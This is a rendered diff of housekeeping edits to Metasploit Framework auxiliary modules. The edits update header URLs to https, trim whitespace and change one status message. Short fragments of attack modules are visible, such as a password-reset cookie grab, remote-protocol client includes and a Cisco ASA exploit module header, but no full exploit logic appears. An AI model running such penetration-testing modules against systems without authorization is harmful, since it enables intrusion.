# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info={}) def initialize(info={})
@ -131,11 +130,10 @@ class MetasploitModule < Msf::Auxiliary
cookies = res.get_cookies cookies = res.get_cookies
if cookies && cookies.match(/(.*); path=\//) if cookies && cookies.match(/(.*); path=\//)
cookie= $1 cookie= $1
print_status("Got cookie #{cookie}. Password reset was successful!\n") print_good("Got cookie #{cookie}. Password reset was successful!\n")
end end
end end
end end
end end
end end

View File

@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -178,5 +177,4 @@ class MetasploitModule < Msf::Auxiliary
def run def run
exploit exploit
end end
end end

View File

@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})

View File

@ -1,12 +1,11 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'uri' require 'uri'
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -152,5 +151,4 @@ class MetasploitModule < Msf::Auxiliary
print_status("Video request sent. Duration set: #{datastore['TIME']} seconds") print_status("Video request sent. Duration set: #{datastore['TIME']} seconds")
play_video_uri play_video_uri
end end
end end

View File

@ -1,6 +1,5 @@
## ##
# encoding: utf-8 # This module requires Metasploit: https://metasploit.com/download
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,12 +1,11 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'metasploit/framework/aws/client' require 'metasploit/framework/aws/client'
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Metasploit::Framework::Aws::Client include Metasploit::Framework::Aws::Client
def initialize(info = {}) def initialize(info = {})

View File

@ -1,12 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::NDMP include Msf::Exploit::Remote::NDMP
def initialize(info = {}) def initialize(info = {})
@ -271,5 +268,4 @@ class MetasploitModule < Msf::Auxiliary
disconnect disconnect
end end
end end

View File

@ -1,12 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::DCERPC
include Msf::Post::Windows::Registry include Msf::Post::Windows::Registry
@ -270,5 +267,4 @@ class MetasploitModule < Msf::Auxiliary
NDR.long(hive) NDR.long(hive)
return stub return stub
end end
end end

View File

@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -79,5 +78,4 @@ class MetasploitModule < Msf::Auxiliary
disconnect disconnect
end end
end end
end end

View File

@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -85,5 +84,4 @@ class MetasploitModule < Msf::Auxiliary
disconnect disconnect
end end
end end
end end

View File

@ -1,9 +1,9 @@
## ##
# auxiliary/admin/cisco/cisco_asa_extrabacon.rb # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Cisco include Msf::Auxiliary::Cisco
@ -219,5 +219,4 @@ class MetasploitModule < Msf::Auxiliary
ver ver
end end
end end

View File

@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner

View File

@ -1,12 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})

View File

@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client
def initialize(info = {}) def initialize(info = {})

View File

@ -1,8 +1,9 @@
# -*- coding: binary -*- # -*- coding: binary -*-
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'dnsruby' require 'dnsruby'
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary

Some files were not shown because too many files have changed in this diff Show More